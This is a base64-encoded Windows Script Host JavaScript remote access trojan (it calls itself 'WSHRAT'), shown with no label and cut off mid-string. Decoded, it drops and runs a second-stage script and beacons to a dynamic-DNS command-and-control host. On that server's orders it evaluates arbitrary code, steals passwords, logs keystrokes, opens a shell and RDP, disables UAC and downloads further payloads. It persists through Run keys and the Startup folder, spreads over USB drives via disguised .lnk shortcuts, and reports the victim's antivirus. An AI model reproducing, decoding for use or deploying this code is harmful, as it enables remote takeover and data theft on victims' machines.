dU5Gc3lNMTBzSUY4M2NuSmlialJiTWpSZExDQmZOM0p5WW00MFd6ZGRMQ0JmTjNKeVltNDBXekkxWFN3Z1h6ZHljbUp1TkZzeU5sMHNJRjgzY25KaWJqUmJNamRkTENCZk4zSnlZbTQwV3pJNFhTd2dYemR5Y21KdU5Gc3lPVjBzSUY4M2NuSmlialJiTXpCZExDQmZOM0p5WW00MFd6TXhYU3dnWHpkeWNtSnVORnN6TWwwc0lGODNjbkppYmpSYk16TmRMQ0JmTjNKeVltNDBXek0wWFYwN0RRb2dJSEpsZEhWeWJpQW9YekI0TkRWbU5DQTlJR1oxYm1OMGFXOXVLQ2tnZXcwS0lDQWdJSEpsZEhWeWJpQldPdzBLSUNCOUtTZ3BPdzBLZlEwS1pYWmhiQ2hrWldOdlpHVmtWR1Y0ZENrN0RRbz0iOwp2YXIgd3NoU2hlbGwxID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsKdmFyIGFwcGRhdGFkaXIxID0gd3NoU2hlbGwxLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncygiJWFwcGRhdGElIik7CnZhciBzdHVicGF0aDEgPSBhcHBkYXRhZGlyMS<>rICJcXENla0lhbFRza2EuanMiOwp2YXIgZGVjb2RlZDEgPSBkZWNvZGVCYXNlNjQobG9uZ1RleHQxKTsKd3JpdGVCeXRlcyhzdHVicGF0aDEsIGRlY29kZWQxKTsKd3NoU2hlbGwxLnJ1bigid3NjcmlwdC<>vL0IgXCIiICsgc3R1YnBhdGgxICsgIlwiIik7Cn1jYXRjaChlcil7fQpmdW5jdGlvbiB3cml0ZUJ5dGVzKGZpbGUsIGJ5dGVzKXsKdHJ5ewp2YXIgYmluYXJ5U3RyZWFtID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIkFET0RCLlN0cmVhbSIpOwpiaW5hcnlTdHJlYW0uVHlwZS<>9IDE7CmJpbmFyeVN0cmVhbS5PcGVuKCk7CmJpbmFyeVN0cmVhbS5Xcml0ZShieXRlcyk7CmJpbmFyeVN0cmVhbS5TYXZlVG9GaWxlKGZpbGUsIDIpOwp9Y2F0Y2goZXJyKXsKfQp9CmZ1bmN0aW9uIGRlY29kZUJhc2U2NChiYXNlNjQpewp2YXIgRE0gPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTERPTSIpOwp2YXIgRUwgPSBETS5jcmVhdGVFbGVtZW50KCJ0bX<>iKTsKRUwuZGF0YVR5cGUgPS<>iYmluLmJhc2U2NCI7CkVMLnRleHQgPSBiYXNlNjQ7CnJldHVybiBFTC5ub2RlVHlwZWRWYWx1ZTsKfQp3c2hTaGVsbDEgPSBudWxsOw0KLy88WyByZWNvZGVyIDoga29nbml0by<>oYykgc2t5cGUgOiBsaXZlOnVua25vd24uc2FsZXM2NCBdPg0KLy89LT0tPS09LT0gY29uZmlnID0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09DQp2YXIgaG9zdC<>9ICJqYmQyMzEuZHVja2Rucy5vcmciOw0KdmFyIHBvcnQgPS<>yMDIyOw0KdmFyIGluc3RhbGxkaXIgPS<>iJWFwcGRhdGElIjsNCnZhciBsbmtmaWxlID0gdHJ1ZTsNCnZhciBsbmtmb2xkZXIgPSB0cnVlOw0KLy89LT0tPS09LT0gcHVibGljIHZhci<>9LT0tPS09LT0tPS09LT0tPS09LT0tPS09DQp2YXIgc2hlbGxvYmogPSBXU2NyaXB0LmNyZWF0ZU9iamVjdCgid3NjcmlwdC5zaGVsbCIpOw0KdmFyIGZpbGVzeXN0ZW1vYmogPSBXU2NyaXB0LmNyZWF0ZU9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCnZhciBodHRwb2JqID0gV1NjcmlwdC5jcmVhdGVPYmplY3QoIm1zeG1sMi54bWxodHRwIik7DQovLz0tPS09LT0tPSBwcml2YXQgdmFyID0tPS09LT0tPS09LT0tPS09LT0tPS09DQp2YXIgaW5zdGFsbG5hbWUgPSBXU2NyaXB0LnNjcmlwdE5hbWU7DQp2YXIgc3RhcnR1cC<>9IHNoZWxsb2JqLnNwZWNpYWxGb2xkZXJzKCJzdGFydHVwIikgKy<>iXFwiOw0KaW5zdGFsbGRpci<>9IHNoZWxsb2JqLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhpbnN0YWxsZGlyKS<>rICJcXCI7DQppZighZmlsZXN5c3RlbW9iai5mb2xkZXJFeGlzdHMoaW5zdGFsbGRpcikpey<>gaW5zdGFsbGRpci<>9IHNoZWxsb2JqLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncygiJXRlbX<>lIikgKy<>iXFwiO30NCnZhciBzcGxpdGVyID0gInwiOw0KdmFyIHNsZWVwID0gNT<>wMDsNCnZhciByZXNwb25zZSwgY21kLCBwYXJhbSwgb25lb25jZTsNCnZhciBpbmYgPS<>iIjsNCnZhciB1c2JzcHJlYWRpbmcgPS<>iIjsNCnZhciBzdGFydGRhdGUgPS<>iIjsNCi8vPS09LT0tPS09IGNvZGUgc3RhcnQgPS09LT0tPS09LT0tPS09LT0tPS09LT0NCmluc3RhbmNlKCk7DQp3aGlsZSh0cnVlKXsNCnRyeXsNCmluc3RhbGwoKTsNCnJlc3BvbnNlID0gIiI7DQpyZXNwb25zZS<>9IHBvc3QgKCJpcy1yZWFkeSIsIiIpOw0KY21kID0gcmVzcG9uc2Uuc3BsaXQoc3BsaXRlcik7DQpzd2l0Y2goY21kWzBdKXsNCmNhc2UgImRpc2Nvbm5lY3QiOg0KV1NjcmlwdC5xdWl0KCk7DQpicmVhazsNCmNhc2UgInJlYm9vdCI6DQpzaGVsbG9iai5ydW4oIiVjb21zcGVjJS<>vYyBzaHV0ZG93bi<>vci<>vdC<>wIC9mIiwgMCwgdHJ1ZSk7DQpicmVhazsNCmNhc2UgInNodXRkb3duIjoNCnNoZWxsb2JqLnJ1bigiJWNvbXNwZWMlIC9jIHNodXRkb3duIC9zIC90ID<>gL2YiLC<>wLCB0cnVlKTsNCmJyZWFrOw0KY2FzZS<>iZXhjZWN1dGUiOg0KcGFyYW0gPSBjbWRbMV07DQpldmFsKHBhcmFtKTsNCmJyZWFrOw0KY2FzZS<>iZ2V0LXBhc3MiOg0KcGFzc2dyYWJiZXIoY21kWzFdLC<>iY21kYy5leGUiLCBjbWRbMl0pOw0KYnJlYWs7DQpjYXNlICJ1bmluc3RhbGwiOg0KdW5pbnN0YWxsKCk7DQpicmVhazsNCmNhc2UgInVwLW4tZXhlYyI6DQpkb3dubG9hZChjbWRbMV0sY21kWzJdKTsNCmJyZWFrOw0KY2FzZS<>iYnJpbmctbG9nIjoNCnVwbG9hZChpbnN0YWxsZGlyICsgIndzaGxvZ3NcXCIgKyBjbWRbMV0sICJ0YWtlLWxvZyIpOw0KYnJlYWs7DQpjYXNlICJkb3duLW4tZXhlYyI6DQpzaXRlZG93bmxvYWRlcihjbWRbMV0sY21kWzJdKTsNCmJyZWFrOw0KY2FzZS<>gImZpbGVtYW5hZ2VyIjoNCnNlcnZpY2VzdGFydGVyKGNtZFsxXSwgImZtLXBsdWdpbi5leGUiLCBpbmZvcm1hdGlvbigpKTsNCmJyZWFrOw0KY2FzZS<>gInJkcCI6DQpzZXJ2aWNlc3RhcnRlcihjbWRbMV0sICJyZC1wbHVnaW4uZXhlIiwgaW5mb3JtYXRpb24oKSk7DQpicmVhazsNCmNhc2UgICJrZXlsb2dnZXIiOg0Ka2V5bG9nZ2Vyc3RhcnRlcihjbWRbMV0sICJrbC1wbHVnaW4uZXhlIiwgaW5mb3JtYXRpb24oKSwgMCk7DQpicmVhazsNCmNhc2UgICJvZmZsaW5lLWtleWxvZ2dlciI6DQprZXlsb2dnZXJzdGFydGVyKGNtZFsxXSwgImtsLXBsdWdpbi5leGUiLCBpbmZvcm1hdGlvbigpLC<>xKTsNCmJyZWFrOw0KY2FzZS<>gImJyb3dzZS1sb2dzIjoNCnBvc3QoImlzLWxvZ3MiLCBlbnVtZmFmKGluc3RhbGxkaXIgKy<>id3NobG9ncyIpKTsNCmJyZWFrOw0KY2FzZS<>gImNtZC1zaGVsbCI6DQpwYXJhbS<>9IGNtZFsxXTsNCnBvc3QoImlzLWNtZC1zaGVsbCIsY21kc2hlbGwocGFyYW0pKTsNCmJyZWFrOw0KY2FzZS<>gImdldC1wcm9jZXNzZXMiOg0KcG9zdCgiaXMtcHJvY2Vzc2VzIiwgZW51bXByb2Nlc3MoKSk7DQpicmVhazsNCmNhc2UgICJkaXNhYmxlLXVhYyI6DQppZihXU2NyaXB0LkFyZ3VtZW50cy5OYW1lZC5FeGlzdHMoImVsZXZhdGVkIikgPT0gdHJ1ZSl7DQp2YXIgb1JlZy<>9IEdldE9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXRpb25MZXZlbD1pbXBlcnNvbmF0ZX0hXFxcXC5cXHJvb3RcXGRlZmF1bHQ6U3RkUmVnUHJvdiIpOw0Kb1JlZy5TZXREd29yZFZhbHVlKDB4OD<>wMD<>wMDIsIlNPRlRXQVJFXFxNaWNyb3NvZnRcXFdpbmRvd3NcXEN1cnJlbnRWZXJzaW9uXFxQb2xpY2llc1xcU3lzdGVtIiwiRW5hYmxlTFVBIiwgMCk7DQpvUmVnLlNldER3b3JkVmFsdWUoMHg4MD<>wMD<>wMiwiU09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFBvbGljaWVzXFxTeXN0ZW0iLCJDb25zZW50UHJvbXB0QmVoYXZpb3JBZG1pbiIsID<>pOw0Kb1JlZy<>9IG51bGw7DQp1cGRhdGVzdGF0dXMoIlVBQytEaXNhYmxlZCsoUmVib290K1JlcXVpcmVkKSIpOw0KfQ0KYnJlYWs7DQpjYXNlIC<>iZWxldmF0ZSI6DQppZihXU2NyaXB0LkFyZ3VtZW50cy5OYW1lZC5FeGlzdHMoImVsZXZhdGVkIikgPT0gZmFsc2Upew0KdHJ5ew0Kb25lb25jZS5jbG9zZSgpOw0Kb25lb25jZS<>9IG51bGw7DQpXU2NyaXB0LkNyZWF0ZU9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKS5TaGVsbEV4ZWN1dGUoIndzY3JpcHQuZXhlIiwgIi<>vL0IgXCIiICsgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZS<>rICJcIi<>vZWxldmF0ZWQiLC<>iIiwgInJ1bmFzIiwgMSk7DQp1cGRhdGVzdGF0dXMoIkNsaWVudCtFbGV2YXRlZCIpOw0KfWNhdGNoKG5uKXsNCn0NCldTY3JpcHQucXVpdCgpOw0KfQ0KZWxzZXsNCnVwZGF0ZXN0YXR1cygiQ2xpZW50K0VsZXZhdGVkIik7DQp9DQpicmVhazsNCmNhc2UgICJpZi1lbGV2YXRlIjoNCmlmKFdTY3JpcHQuQXJndW1lbnRzLk5hbWVkLkV4aXN0cygiZWxldmF0ZWQiKS<>9PSBmYWxzZSl7DQp1cGRhdGVzdGF0dXMoIkNsaWVudCtOb3QrRWxldmF0ZWQiKTsNCn0NCmVsc2V7DQp1cGRhdGVzdGF0dXMoIkNsaWVudCtFbGV2YXRlZCIpOw0KfQ0KYnJlYWs7DQpjYXNlIC<>ia2lsbC1wcm9jZXNzIjoNCmV4aXRwcm9jZXNzKGNtZFsxXSk7DQpicmVhazsNCmNhc2UgICJzbGVlcCI6DQpwYXJhbS<>9IGNtZFsxXTsNCnNsZWVwID0gZXZhbChwYXJhbSk7DQpicmVhazsNCn0NCn1jYXRjaChlcil7fQ0KV1NjcmlwdC5zbGVlcChzbGVlcCk7DQp9DQpmdW5jdGlvbiBpbnN0YWxsKCl7DQp2YXIgbG5rb2JqOw0KdmFyIGZpbGVuYW1lOw0KdmFyIGZvbGRlcm5hbWU7DQp2YXIgZmlsZWljb247DQp2YXIgZm9sZGVyaWNvbjsNCnVwc3RhcnQoKTsNCmZvcih2YXIgZHJpID0gbmV3IEVudW1lcmF0b3IoZmlsZXN5c3RlbW9iai5kcml2ZXMpOy<>hZHJpLmF0RW5kKCk7IGRyaS5tb3ZlTmV4dCgpKXsNCnZhciBkcml2ZS<>9IGRyaS5pdGVtKCk7DQppZi<>oZHJpdmUuaXNyZWFkeS<>9PSB0cnVlKXsNCmlmIChkcml2ZS5mcmVlc3BhY2UgPi<>wICl7DQppZi<>oZHJpdmUuZHJpdmV0eXBlID09IDEgKXsNCnRyeXsNCmZpbGVzeXN0ZW1vYmouY29weUZpbGUoV1NjcmlwdC5zY3JpcHRGdWxsTmFtZS<>sIGRyaXZlLnBhdGggKy<>iXFwiICsgaW5zdGFsbG5hbWUsdHJ1ZSk7DQppZi<>oZmlsZXN5c3RlbW9iai5maWxlRXhpc3RzIChkcml2ZS5wYXRoICsgIlxcIi<>rIGluc3RhbGxuYW1lKSl7DQpmaWxlc3lzdGVtb2JqLmdldEZpbGUoZHJpdmUucGF0aC<>rICJcXCIgICsgaW5zdGFsbG5hbWUpLmF0dHJpYnV0ZXMgPS<>yKzQ7DQp9DQp9Y2F0Y2goZWlqdSl7fQ0KZm9yKHZhciBmaS<>9IG5ldyBFbnVtZXJhdG9yKGZpbGVzeXN0ZW1vYmouZ2V0Zm9sZGVyKGRyaXZlLnBhdGggKy<>iXFwiKS5maWxlcyk7ICFmaS5hdEVuZCgpOyBmaS5tb3ZlTmV4dCgpKXsNCnRyeXsNCnZhciBmaWxlID0gZmkuaXRlbSgpOw0KaWYgKGxua2ZpbGUgPT0gZmFsc2Upe2JyZWFrO30NCmlmIChmaWxlLm5hbWUuaW5kZXhPZigiLiIpKXsNCmlmICgoZmlsZS5uYW1lLnNwbGl0KCIuIilbZmlsZS5uYW1lLnNwbGl0KCIuIikubGVuZ3RoIC0gMV0pLnRvTG93ZXJDYXNlKCkgIT0gImxuayIpew0KZmlsZS5hdHRyaWJ1dGVzID0gMis0Ow0KaWYgKGZpbGUubmFtZS50b1VwcGVyQ2FzZSgpICE9IGluc3RhbGxuYW1lLnRvVXBwZXJDYXNlKCkpew0KZmlsZW5hbWUgPSBmaWxlLm5hbWUuc3BsaXQoIi4iKTsNCmxua29iai<>9IHNoZWxsb2JqLmNyZWF0ZVNob3J0Y3V0KGRyaXZlLnBhdGggKy<>iXFwiIC<>rIGZpbGVuYW1lWzBdICsgIi5sbmsiKTsNCmxua29iai53aW5kb3dTdHlsZS<>9IDc7DQpsbmtvYmoudGFyZ2V0UGF0aC<>9ICJjbWQuZXhlIjsNCmxua29iai53b3JraW5nRGlyZWN0b3J5ID0gIiI7DQpsbmtvYmouYXJndW1lbnRzID0gIi9jIHN0YXJ0ICIgKyBpbnN0YWxsbmFtZS5yZXBsYWNlKG5ldyBSZWdFeH<>oIi<>iLC<>iZyIpLC<>iXCIgXCIiKS<>rICImc3RhcnQgIi<>rIGZpbGUubmFtZS5yZXBsYWNlKG5ldyBSZWdFeH<>oIi<>iLC<>iZyIpLC<>iXCIgXCIiKS<>rIiZleGl0IjsNCnRyeXtmaWxlaWNvbi<>9IHNoZWxsb2JqLlJlZ1JlYWQgKCJIS0VZX0xPQ0FMX01BQ0hJTkVcXHNvZnR3YXJlXFxjbGFzc2VzXFwiICsgc2hlbGxvYmouUmVnUmVhZC<>oIkhLRVlfTE9DQUxfTUFDSElORVxcc29mdHdhcmVcXGNsYXNzZXNcXC4iICsgZmlsZS5uYW1lLnNwbGl0KCIuIilbZmlsZS5uYW1lLnNwbGl0KCIuIikubGVuZ3RoIC0gMV0rICJcXCIpICsgIlxcZGVmYXVsdGljb25cXCIpOyB9Y2F0Y2goZWVlZSl7fQ0KaWYgKGZpbGVpY29uLmluZGV4T2YoIiwiKS<>9PS<>wKXsNCmxua29iai5pY29uTG9jYXRpb24gPSBmaWxlLnBhdGg7DQp9ZWxzZSB7DQpsbmtvYmouaWNvbkxvY2F0aW9uID0gZmlsZWljb247DQp9DQpsbmtvYmouc2F2ZSgpOw0KfQ0KfQ0KfQ0KfWNhdGNoKGVycil7fQ0KfQ0KZm9yKHZhciBmaS<>9IG5ldyBFbnVtZXJhdG9yKGZpbGVzeXN0ZW1vYmouZ2V0Zm9sZGVyKGRyaXZlLnBhdGggKy<>iXFwiKS5zdWJGb2xkZXJzKTsgIWZpLmF0RW5kKCk7IGZpLm1vdmVOZXh0KCkpew0KdHJ5ew0KdmFyIGZvbGRlci<>9IGZpLml0ZW0oKTsNCmlmIChsbmtmb2xkZXIgPT0gZmFsc2Upe2JyZWFrO30NCmZvbGRlci5hdHRyaWJ1dGVzID0gMis0Ow0KZm9sZGVybmFtZS<>9IGZvbGRlci5uYW1lOw0KbG5rb2JqID0gc2hlbGxvYmouY3JlYXRlU2hvcnRjdXQoZHJpdmUucGF0aC<>rICJcXCIgICsgZm9sZGVybmFtZS<>rICIubG5rIik7DQpsbmtvYmoud2luZG93U3R5bGUgPS<>3Ow0KbG5rb2JqLnRhcmdldFBhdGggPS<>iY21kLmV4ZSI7DQpsbmtvYmoud29ya2luZ0RpcmVjdG9yeS<>9ICIiOw0KbG5rb2JqLmFyZ3VtZW50cy<>9ICIvYyBzdGFydC<>iICsgaW5zdGFsbG5hbWUucmVwbGFjZShuZXcgUmVnRXhwKCIgIiwgImciKSwgIlwiIFwiIikgKy<>iJnN0YXJ0IGV4cGxvcmVyICIgKyBmb2xkZXIubmFtZS5yZXBsYWNlKG5ldyBSZWdFeH<>oIi<>iLC<>iZyIpLC<>iXCIgXCIiKS<>rIiZleGl0IjsNCmZvbGRlcmljb24gPSBzaGVsbG9iai5SZWdSZWFkKCJIS0VZX0xPQ0FMX01BQ0hJTkVcXHNvZnR3YXJlXFxjbGFzc2VzXFxmb2xkZXJcXGRlZmF1bHRpY29uXFwiKTsNCmlmIChmb2xkZXJpY29uLmluZGV4T2YoIiwiKS<>9PS<>wKXsNCmxua29iai5pY29uTG9jYXRpb24gPSBmb2xkZXIucGF0aDsNCn1lbHNlIHsNCmxua29iai5pY29uTG9jYXRpb24gPSBmb2xkZXJpY29uOw0KfQ0KbG5rb2JqLnNhdmUoKTsNCn1jYXRjaChlcnIpe30NCn0NCn0NCn0NCn0NCn0NCn0NCmZ1bmN0aW9uIHVuaW5zdGFsbCgpew0KdHJ5ew0KdmFyIGZpbGVuYW1lOw0KdmFyIGZvbGRlcm5hbWU7DQp0cnl7DQpzaGVsbG9iai5SZWdEZWxldGUoIkhLRVlfQ1VSUkVOVF9VU0VSXFxzb2Z0d2FyZVxcbWljcm9zb2Z0XFx3aW5kb3dzXFxjdXJyZW50dmVyc2lvblxccnVuXFwiICsgaW5zdGFsbG5hbWUuc3BsaXQoIi4iKVswXSk7DQpzaGVsbG9iai5SZWdEZWxldGUoIkhLRVlfTE9DQUxfTUFDSElORVxcc29mdHdhcmVcXG1pY3Jvc29mdFxcd2luZG93c1xcY3VycmVudHZlcnNpb25cXHJ1blxcIi<>rIGluc3RhbGxuYW1lLnNwbGl0KCIuIilbMF0pOw0KfWNhdGNoKGVpKXt9DQp0cnl7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUoc3RhcnR1cC<>rIGluc3RhbGxuYW1lICx0cnVlKTsNCmZpbGVzeXN0ZW1vYmouZGVsZXRlRmlsZSh3c2NyaXB0LnNjcmlwdGZ1bGxuYW1lICx0cnVlKTsNCn1jYXRjaChlZWope30NCmZvcih2YXIgZHJpID0gbmV3IEVudW1lcmF0b3IoZmlsZXN5c3RlbW9iai5kcml2ZXMpOy<>hZHJpLmF0RW5kKCk7IGRyaS5tb3ZlTmV4dCgpKXsNCnZhciBkcml2ZS<>9IGRyaS5pdGVtKCk7DQppZi<>oZHJpdmUuaXNyZWFkeS<>9PSB0cnVlKXsNCmlmIChkcml2ZS5mcmVlc3BhY2UgPi<>wICl7DQppZi<>oZHJpdmUuZHJpdmV0eXBlID09IDEgKXsNCmZvcih2YXIgZmkgPSBuZXcgRW51bWVyYXRvcihmaWxlc3lzdGVtb2JqLmdldGZvbGRlcihkcml2ZS5wYXRoICsgIlxcIikuZmlsZXMpOy<>hZmkuYXRFbmQoKTsgZmkubW92ZU5leHQoKSl7DQp2YXIgZmlsZS<>9IGZpLml0ZW0oKTsNCnRyeXsNCmlmIChmaWxlLm5hbWUuaW5kZXhPZigiLiIpKXsNCmlmICgoZmlsZS5uYW1lLnNwbGl0KCIuIilbZmlsZS5uYW1lLnNwbGl0KCIuIikubGVuZ3RoIC0gMV0pLnRvTG93ZXJDYXNlKCkgIT0gImxuayIpew0KZmlsZS5hdHRyaWJ1dGVzID0gMDsNCmlmIChmaWxlLm5hbWUudG9VcHBlckNhc2UoKS<>hPSBpbnN0YWxsbmFtZS50b1VwcGVyQ2FzZSgpKXsNCmZpbGVuYW1lID0gZmlsZS5uYW1lLnNwbGl0KCIuIik7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUoZHJpdmUucGF0aC<>rICJcXCIgKyBmaWxlbmFtZVswXS<>rICIubG5rIi<>pOw0KfWVsc2V7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUoZHJpdmUucGF0aC<>rICJcXCIgKyBmaWxlLm5hbWUpOw0KfQ0KfWVsc2V7DQpmaWxlc3lzdGVtb2JqLmRlbGV0ZUZpbGUgKGZpbGUucGF0aCk7DQp9DQp9DQp9Y2F0Y2goZXgpe30NCn0NCmZvcih2YXIgZmkgPSBuZXcgRW51bWVyYXRvcihmaWxlc3lzdGVtb2JqLmdldGZvbGRlcihkcml2ZS5wYXRoICsgIlxcIikuc3ViRm9sZGVycyk7ICFmaS5hdEVuZCgpOyBmaS5tb3ZlTmV4dCgpKXsNCnZhciBmb2xkZXIgPSBmaS5pdGVtKCk7DQpmb2xkZXIuYXR0cmlidXRlcy<>9ID<>7DQp9DQp9DQp9DQp9DQp9DQp9Y2F0Y2goZXJyKXt9DQpXU2NyaXB0LnF1aXQoKTsNCn0NCmZ1bmN0aW9uIHBvc3QgKGNtZC<>scGFyYW0pew0KdHJ5ew0KaHR0cG9iai5vcGVuKCJwb3N0IiwiaHR0cDovLyIgKyBob3N0ICsgIjoiICsgcG9ydC<>rIi8iICsgY21kLCBmYWxzZSk7DQpodHRwb2JqLnNldFJlcXVlc3RIZWFkZXIoInVzZXItYWdlbnQ6IixpbmZvcm1hdGlvbigpKTsNCmh0dHBvYmouc2VuZChwYXJhbSk7DQpyZXR1cm4gaHR0cG9iai5yZXNwb25zZVRleHQ7DQp9Y2F0Y2goZXJyKXsNCnJldHVybi<>iIjsNCn0NCn0NCmZ1bmN0aW9uIGluZm9ybWF0aW9uKCl7DQp0cnl7DQppZi<>oaW5mID09ICIiKXsNCmluZi<>9IGh3aWQoKS<>rIHNwbGl0ZXI7DQppbmYgPSBpbmYgICsgc2hlbGxvYmouRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlY29tcHV0ZXJuYW1lJSIpICsgc3BsaXRlci<>7DQppbmYgPSBpbmYgICsgc2hlbGxvYmouRXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIldXNlcm5hbWUlIikgKyBzcGxpdGVyOw0KdmFyIHJvb3QgPSBHZXRPYmplY3QoIndpbm1nbXRzOntpbXBlcnNvbmF0aW9ubGV2ZWw9aW1wZXJzb25hdGV9IVxcXFwuXFxyb290XFxjaW12MiIpOw0KdmFyIG9zID0gcm9vdC5FeGVjUXVlcnkgKCJzZWxlY3QgKiBmcm9tIHdpbjMyX29wZXJhdGluZ3N5c3RlbSIpOw0KZm9yKHZhciBmaS<>9IG5ldyBFbnVtZXJhdG9yKG9zKTsgIWZpLmF0RW5kKCk7IGZpLm1vdmVOZXh0KCkpew0KdmFyIG9zaW5mby<>9IGZpLml0ZW0oKTsNCmluZi<>9IGluZi<>rIG9zaW5mby5jYXB0aW9uICsgc3BsaXRlcjsNCmJyZWFrOw0KfQ0KaW5mID0gaW5mICsgInBsdXMiICsgc3BsaXRlcjsNCmluZi<>9IGluZi<>rIHNlY3VyaXR5KCkgKyBzcGxpdGVyOw0KaW5mID0gaW5mICsgdXNic3ByZWFkaW5nOw0KaW5mID0gIldTSFJBVCIgKyBzcGxpdGVyICsgaW5mICsgc3BsaXRlci<>rICJKYXZhU2NyaXB0Ii<>7DQpyZXR1cm4gaW5mOw0KfWVsc2V7DQpyZXR1cm4gaW5mOw0KfQ0KfWNhdGNoKGVycil7DQpyZXR1cm4gIiI7DQp9DQp9DQpmdW5jdGlvbiB1cHN0YXJ0ICgpew0KdHJ5ew0KdHJ5ew0Kc2hlbGxvYmouUmVnV3JpdGUoIkhLRVlfQ1VSUkVOVF9VU0VSXFxzb2Z0d2FyZVxcbWljcm9zb2Z0XFx3aW5kb3dzXFxjdXJyZW50dmVyc2lvblxccnVuXFwiICsgaW5zdGFsbG5hbWUuc3BsaXQoIi4iKVswXSwgICJ3c2NyaXB0LmV4ZS<>vL0IgXCIiICsgaW5zdGFsbGRpci<>rIGluc3RhbGxuYW1lICsgIlwiIi<>sICJSRUdfU1oiKTsNCnNoZWxsb2JqLlJlZ1dyaXRlKCJIS0VZX0xPQ0FMX01BQ0hJTkVcXHNvZnR3YXJlXFxtaWNyb3NvZnRcXHdpbmRvd3NcXGN1cnJlbnR2ZXJzaW9uXFxydW5cXCIgKyBpbnN0YWxsbmFtZS5zcGxpdCgiLiIpWzBdLC<>gIndzY3JpcHQuZXhlIC8vQiBcIiIgKyBpbnN0YWxsZGlyICsgaW5zdGFsbG5hbWUgKy<>iXCIiICwgIlJFR19TWiIpOw0KfWNhdGNoKGVpKXt9DQpmaWxlc3lzdGVtb2JqLmNvcHlGaWxlKFdTY3JpcHQuc2NyaXB0RnVsbE5hbWUsIGluc3RhbGxkaXIgKyBpbnN0YWxsbmFtZSwgdHJ1ZSk7DQpmaWxlc3lzdGVtb2JqLmNvcHlGaWxlKFdTY3JpcHQuc2NyaXB0RnVsbE5hbWUsIHN0YXJ0dX<>gKyBpbnN0YWxsbmFtZSwgdHJ1ZSk7DQp9Y2F0Y2goZXJyKXt9DQp9DQpmdW5jdGlvbiBod2lkKCl7DQp0cnl7DQp2YXIgcm9vdC<>9IEdldE9iamVjdCgid2lubWdtdHM6e2ltcGVyc29uYXRpb25MZXZlbD1pbXBlcnNvbmF0ZX0hXFxcXC5cXHJvb3RcXGNpbXYyIik7DQp2YXIgZGlza3MgPSByb290LkV4ZWNRdWVyeS<>oInNlbGVjdC<>qIGZyb20gd2luMzJfbG9naWNhbGRpc2siKTsNCmZvcih2YXIgZmkgPSBuZXcgRW51bWVyYXRvcihkaXNrcyk7ICFmaS5hdEVuZCgpOyBmaS5tb3ZlTmV4dCgpKXsNCnZhciBkaXNrID0gZmkuaXRlbSgpOw0KaWYgKGRpc2sudm9sdW1lU2VyaWFsTnVtYmVyICE9ICIiKXsNCnJldHVybiBkaXNrLnZvbHVtZVNlcmlhbE51bWJlcjsNCmJyZWFrOw0KfQ0KfQ0KfWNhdGNoKGVycil7DQpyZXR1cm4gIiI7DQp9DQp9DQpmdW5jdGlvbiBzZWN1cml0eSgpew0KdHJ5ew0KdmFyIG9iandtaXNlcnZpY2UgPSBHZXRPYmplY3QoIndpbm1nbXRzOntpbXBlcnNvbmF0aW9ubGV2ZWw9aW1wZXJzb25hdGV9IVxcXFwuXFxyb290XFxjaW12MiIpOw0KdmFyIGNvbGl0ZW1zID0gb2Jqd21pc2VydmljZS5FeGVjUXVlcnkoInNlbGVjdC<>qIGZyb20gd2luMzJfb3BlcmF0aW5nc3lzdGVtIixudWxsLDQ4KTsNCnZhciB2ZXJzaW9uc3RyLCBvc3ZlcnNpb247DQpmb3IodmFyIGZpID0gbmV3IEVudW1lcmF0b3IoY29saXRlbXMpOy<>hZmkuYXRFbmQoKTsgZmkubW92ZU5leHQoKSl7DQp2YXIgb2JqaXRlbS<>9IGZpLml0ZW0oKTsNCnZlcnNpb25zdHIgPSBvYmppdGVtLnZlcnNpb24udG9TdHJpbmcoKS5zcGxpdCgiLiIpOw0KfQ0KLy92ZXJzaW9uc3RyID0gY29saXRlbXMudmVyc2lvbi5zcGxpdCgiLiIpOw0Kb3N2ZXJzaW9uID0gdmVyc2lvbnN0clswXS<>rICIuIjsNCmZvci<>odmFyIHggPS<>xOyB4IDwgdmVyc2lvbnN0ci5sZW5ndGg7IHgrKyl7DQpvc3ZlcnNpb24gPSBvc3ZlcnNpb24gKyB2ZXJzaW9uc3RyWzBdOw0KfQ0Kb3N2ZXJzaW9uID0gZXZhbChvc3ZlcnNpb24pOw0KdmFyIHNjOw0KaWYgKG9zdmVyc2lvbi<>+IDYpeyBzYy<>9ICJzZWN1cml0eWNlbnRlcjIiOyB9ZWxzZXsgc2MgPS<>ic2VjdXJpdHljZW50ZXIiO30NCnZhciBvYmpzZWN1cml0eWNlbnRlci<>9IEdldE9iamVjdCgid2lubWdtdHM6XFxcXGxvY2FsaG9zdFxccm9vdFxcIi<>rIHNjKTsNCnZhciBjb2xhbnRpdmlydXMgPSBvYmpzZWN1cml0eWNlbnRlci5FeGVjUXVlcnkoInNlbGVjdC<>qIGZyb20gYW50aXZpcnVzcHJvZHVjdCIsICJ3cWwiLC<>wKTsNCnZhciBzZWN1ID0gIiI7DQpmb3IodmFyIGZpID0gbmV3IEVudW1lcmF0b3IoY29sYW50aXZpcnVzKTsgIWZpLmF0RW5kKCk7IGZpLm1vdmVOZXh0KCkpew0KdmFyIG9iamFudGl2aXJ1cy<>9IGZpLml0ZW0oKTsNCnNlY3UgPSBzZWN1IC<>rIG9iamFudGl2aXJ1cy5kaXNwbGF5TmFtZS<>rICIgLiI7DQp9DQppZihzZWN1ID09ICIiKXtzZWN1ID0gIm5hbi1hdiI7fQ0KcmV0dXJuIHNlY3U7DQp9Y2F0Y2goZXJyK